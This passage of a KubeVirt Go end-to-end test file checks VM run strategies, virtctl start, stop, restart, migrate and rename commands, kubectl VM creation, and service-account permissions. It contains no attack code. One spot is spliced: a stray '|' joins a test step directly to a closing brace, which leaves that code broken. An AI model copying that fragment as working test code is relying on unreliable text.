vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
})
It("[test_id:4119]should migrate a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl migrate")
migrateCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_MIGRATE, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(migrateCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is migrated")
Eventually(func() bool {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return nextVMI.Status.MigrationState != nil && nextVMI.Status.MigrationState.Completed
}, 240*time.Second, 1*time.Second).Should(BeTrue())
})
})
Context("Using RunStrategyRerunOnFailure", func() {
It("[test_id:2186] should stop a running VM", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyHalted))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:2187] should restart a running VM", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyRerunOnFailure))
By("Ensuring stateChangeRequests list gets cleared")
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:2188] should not remove a succeeded VMI", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
By("Waiting for VMI to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance enters Succeeded phase")
Eventually(func() v1.VirtualMachineInstancePhase {
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase
}, 240*time.Second, 1*time.Second).Should(Equal(v1.Succeeded))
// At this point, explicitly test that a start command will delete an existing
// VMI in the Succeeded phase.
By("Invoking virtctl start")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for StartRequest to be cleared")
Eventually(func() int {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0), "StateChangeRequest was never cleared")
By("Waiting for VM to be ready") | }, 360*time.Second, 1*time.Second).Should(BeTrue())
})
})
Context("Using RunStrategyHalted", func() {
It("[test_id:2037] should start a stopped VM", func() {
By("creating a VM with RunStrategyHalted")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyHalted)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyAlways))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
})
Context("Using RunStrategyManual", func() {
It("[test_id:2036] should start", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyManual))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:2189] should stop", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() bool {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
return errors.IsNotFound(err)
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring stateChangeRequests list is cleared")
Eventually(func() bool {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
return false
}
if newVM.Spec.RunStrategy == nil || *newVM.Spec.RunStrategy != v1.RunStrategyManual {
return false
}
return len(newVM.Status.StateChangeRequests) == 0
}, 30*time.Second, time.Second).Should(BeTrue())
})
It("[test_id:2035] should restart", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Invoking virtctl restart should fail")
err = restartCommand()
Expect(err).To(HaveOccurred())
By("Invoking virtctl start")
err = startCommand()
Expect(err).NotTo(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is stopped")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
Expect(err).ToNot(HaveOccurred())
}
return vm.Status.Created
}, 240*time.Second, 1*time.Second).Should(BeFalse())
By("Waiting state change request to clear for stopped VM")
Eventually(func() int {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(virtualMachine.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0))
By("Invoking virtctl start")
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyManual))
By("Ensuring stateChangeRequests list gets cleared")
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:2190] should not remove a succeeded VMI", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance enters Succeeded phase")
Eventually(func() v1.VirtualMachineInstancePhase {
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase
}, 240*time.Second, 1*time.Second).Should(Equal(v1.Succeeded))
// At this point, explicitly test that a start command will delete an existing
// VMI in the Succeeded phase.
By("Invoking virtctl start")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for StartRequest to be cleared")
Eventually(func() int {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0), "StateChangeRequest was never cleared")
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
})
})
})
Context("VM rename", func() {
var vm1 *v1.VirtualMachine
BeforeEach(func() {
vm1 = newVirtualMachine(false)
})
It("should rename a stopped VM only once", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name+"new",
"--namespace", vm1.Namespace)
Expect(renameCommand()).To(Succeed())
Expect(renameCommand()).ToNot(Succeed())
})
It("should rename a stopped VM", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name+"new",
"--namespace", vm1.Namespace)
Expect(renameCommand()).To(Succeed())
})
It("should reject renaming a running VM", func() {
vm2 := newVirtualMachine(true)
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm2.Name, vm2.Name+"new",
"--namespace", vm2.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM to the same name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name,
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM with an empty name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, "",
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM with invalid name", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, "invalid name <>?:;",
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
It("should reject renaming a VM if the new name is taken", func() {
vm2 := newVirtualMachine(true)
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm2.Name,
"--namespace", vm1.Namespace)
Expect(renameCommand()).ToNot(Succeed())
})
})
})
Context("[rfe_id:273]with oc/kubectl", func() {
var vmi *v1.VirtualMachineInstance
var err error
var vmJson string
var k8sClient string
var workDir string
var vmRunningRe *regexp.Regexp
BeforeEach(func() {
k8sClient = tests.GetK8sCmdClient()
tests.SkipIfNoCmd(k8sClient)
workDir, err = ioutil.TempDir("", tests.TempDirPrefix+"-")
Expect(err).ToNot(HaveOccurred())
// By default "." does not match newline: "Phase" and "Running" only match if on same line.
vmRunningRe = regexp.MustCompile("Phase.*Running")
})
AfterEach(func() {
if workDir != "" {
err = os.RemoveAll(workDir)
Expect(err).ToNot(HaveOccurred())
workDir = ""
}
})
It("[test_id:243][posneg:negative]should create VM only once", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Creating VM with DataVolumeTemplate entry with k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Verifying VM is created")
newVM, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred(), "New VM was not created")
Expect(newVM.Name).To(Equal(vm.Name), "New VM was not created")
By("Creating the VM again")
_, stdErr, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).To(HaveOccurred())
Expect(strings.HasPrefix(stdErr, "Error from server (AlreadyExists): error when creating")).To(BeTrue(), "command should error when creating VM second time")
})
It("[test_id:299]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Creating VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Listing running pods")
stdout, _, err := tests.RunCommand(k8sClient, "get", "pods")
Expect(err).ToNot(HaveOccurred())
By("Ensuring pod is running")
expectedPodName := getExpectedPodName(vm)
podRunningRe, err := regexp.Compile(fmt.Sprintf("%s.*Running", expectedPodName))
Expect(err).ToNot(HaveOccurred())
Expect(podRunningRe.FindString(stdout)).ToNot(Equal(""), "Pod is not Running")
By("Checking that VM is running")
stdout, _, err = tests.RunCommand(k8sClient, "describe", "vmis", vm.GetName())
Expect(err).ToNot(HaveOccurred())
Expect(vmRunningRe.FindString(stdout)).ToNot(Equal(""), "VMI is not Running")
})
It("[test_id:264]should create and delete via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
thisVm := tests.NewRandomVirtualMachine(vmi, false)
vmJson, err = tests.GenerateVMJson(thisVm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VM's manifest")
By("Creating VM using k8s client binary")
_, _, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Invoking virtctl start")
virtctl := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", thisVm.Namespace, thisVm.Name)
err = virtctl()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Checking that VM is running")
stdout, _, err := tests.RunCommand(k8sClient, "describe", "vmis", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
Expect(vmRunningRe.FindString(stdout)).ToNot(Equal(""), "VMI is not Running")
By("Deleting VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "delete", "vm", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
By("Verifying the VM gets deleted")
waitForResourceDeletion(k8sClient, "vms", thisVm.GetName())
By("Verifying pod gets deleted")
expectedPodName := getExpectedPodName(thisVm)
waitForResourceDeletion(k8sClient, "pods", expectedPodName)
})
It("[test_id:232]should create same manifest twice via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
thisVm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(thisVm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VM's manifest")
By("Creating VM using k8s client binary")
_, _, err := tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
By("Deleting VM using k8s client binary")
_, _, err = tests.RunCommand(k8sClient, "delete", "vm", thisVm.GetName())
Expect(err).ToNot(HaveOccurred())
By("Verifying the VM gets deleted")
waitForResourceDeletion(k8sClient, "vms", thisVm.GetName())
By("Creating same VM using k8s client binary and same manifest")
_, _, err = tests.RunCommand(k8sClient, "create", "-f", vmJson)
Expect(err).ToNot(HaveOccurred())
By("Waiting for VMI to start")
waitForVMIStart(virtClient, vmi)
})
It("[test_id:233][posneg:negative]should fail when deleting nonexistent VM", func() {
vmi := tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
By("Creating VM with DataVolumeTemplate entry with k8s client binary")
_, stdErr, err := tests.RunCommand(k8sClient, "delete", "vm", vmi.Name)
Expect(err).To(HaveOccurred())
Expect(strings.HasPrefix(stdErr, "Error from server (NotFound): virtualmachines.kubevirt.io")).To(BeTrue(), "should fail when deleting non existent VM")
})
Context("as ordinary OCP user trough test service account", func() {
var testUser string
BeforeEach(func() {
testUser = "testuser-" + uuid.NewRandom().String()
})
Context("should succeed with right rights", func() {
BeforeEach(func() {
// kubectl doesn't have "adm" subcommand -- only oc does
tests.SkipIfNoCmd("oc")
By("Ensuring the cluster has new test serviceaccount")
stdOut, stdErr, err := tests.RunCommand(k8sClient, "create", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
By("Ensuring user has the admin rights for the test namespace project")
// This simulates the ordinary user as an admin in this project
stdOut, stdErr, err = tests.RunCommand(k8sClient, "adm", "policy", "add-role-to-user", "admin", fmt.Sprintf("system:serviceaccount:%s:%s", tests.NamespaceTestDefault, testUser))
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
AfterEach(func() {
stdOut, stdErr, err := tests.RunCommand(k8sClient, "adm", "policy", "remove-role-from-user", "admin", fmt.Sprintf("system:serviceaccount:%s:%s", tests.NamespaceTestDefault, testUser))
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
stdOut, stdErr, err = tests.RunCommand(k8sClient, "delete", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
It("[test_id:2839]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Checking VM creation permission using k8s client binary")
// It might take time for the role to propagate
Eventually(func() string {
stdOut, _, _ := tests.RunCommand(k8sClient, "auth", "can-i", "create", "vms", "--as", testUser)
return strings.TrimSpace(stdOut)
}, 10*time.Second, 1*time.Second).Should(Equal("yes"), fmt.Sprintf("test account '%s' was never granted permission to create a VM", testUser))
})
})
Context("should fail without right rights", func() {
BeforeEach(func() {
By("Ensuring the cluster has new test serviceaccount")
stdOut, stdErr, err := tests.RunCommandWithNS(tests.NamespaceTestDefault, k8sClient, "create", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
AfterEach(func() {
stdOut, stdErr, err := tests.RunCommandWithNS(tests.NamespaceTestDefault, k8sClient, "delete", "serviceaccount", testUser)
Expect(err).ToNot(HaveOccurred(), "ERR: %s", stdOut+stdErr)
})
It("[test_id:2914]should create VM via command line", func() {
vmi = tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskAlpine))
vm := tests.NewRandomVirtualMachine(vmi, true)
vmJson, err = tests.GenerateVMJson(vm, workDir)
Expect(err).ToNot(HaveOccurred(), "Cannot generate VMs manifest")
By("Checking VM creation permission using k8s client binary")
stdOut, _, err := tests.RunCommand(k8sClient, "auth", "can-i", "create", "vms", "--as", testUser)
// non-zero exit code
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("exit status 1"))
Expect(strings.TrimSpace(stdOut)).To(Equal("no"))
})
})
})
})
Context("VM rename", func() {
var (
vm *v1.VirtualMachine
cli kubecli.VirtualMachineInterface
)
BeforeEach(func() {
vm = tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli = virtClient.VirtualMachine(tests.NamespaceTestDefault)
})
Context("VM creation", func() {
It("should fail if a VM is created with a rename request", func() {
vm.Status.StateChangeRequests = []v1.VirtualMachineStateChangeRequest{
{
Action: v1.RenameRequest,
Data: map[string]string{
"newName": "something-new",
},
},
}
_, err := cli.Create(vm)
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("Creating a VM with a rename request is not allowed"))
})
})
Context("VM update", func() {
var (
vm1 *v1.VirtualMachine
)
BeforeEach(func() {
vm1 = tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli.Create(vm1)
})
It("should fail if the new name is already taken", func() {
vm2 := tests.NewRandomVMWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskCirros))
cli.Create(vm2)
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm2.Name})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("name already exists"))
})
It("should fail if the new name is empty", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("Please provide a new name for the VM"))
})
It("should fail if the new name is invalid", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: "invalid name <>?:;"})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("The VM's new name is not valid"))
})
It("should fail if the new name is identical to the current name", func() {
err := cli.Rename(vm1.Name, &v1.RenameOptions{NewName: vm1.Name})
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("identical"))
})
It("should fail if the VM is running", func() {
err := cli.Start(vm1.Name)
